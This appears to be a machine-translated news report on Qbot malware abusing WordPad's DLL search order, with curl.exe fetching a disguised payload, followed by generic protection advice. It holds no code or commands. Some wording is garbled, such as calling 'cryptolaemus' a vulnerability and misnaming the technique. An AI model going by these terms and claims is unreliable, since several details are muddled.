As he reported 24 Channelscommunity experts mentioned the vulnerability cryptolaemus. This development raises concerns about the security of Windows 10 users and the potential for similar attacks against other software.

New attack mechanic

The vulnerability lies in WordPad’s DLL file search mechanism, which is necessary for the program to work properly. When WordPad starts, it automatically searches for DLL files starting from the folder containing its executable. However, this process does not check the integrity or legitimacy of DLL files, which allows attackers to inject malicious code.

This type of attack, known as DLL “loading” or “tampering”, has been used in the past. A similar vulnerability was previously discovered in Windows Calculator that allowed cybercriminals to execute malicious code. The hackers took advantage of the ability to find DLL files in WordPad to continue their malicious activity.

When the malicious DLL file starts WordPad, it accesses the Curl.exe executable in the System32 folder. This executable is used to download an obscured PNG image, which is actually an old version of the Qbot Trojan.

One worrying aspect of this attack is that it uses the resources of the legitimate WordPad program, making it difficult for anti-virus programs to detect the threat. This increases the likelihood that an attack will go undetected by unsuspecting users. In addition, the attack is due to the presence of the Curl.exe utility, which is not included in the standard Windows package prior to version 10.

How do you protect yourself from an attack?

Users are strongly advised to regularly update their antivirus software and operating systems to guard against such vulnerabilities. Microsoft has been notified of this issue and is expected to release a security patch to address the WordPad vulnerability as soon as possible. Meanwhile, users should exercise caution when opening files or documents from untrusted sources, especially those received via email.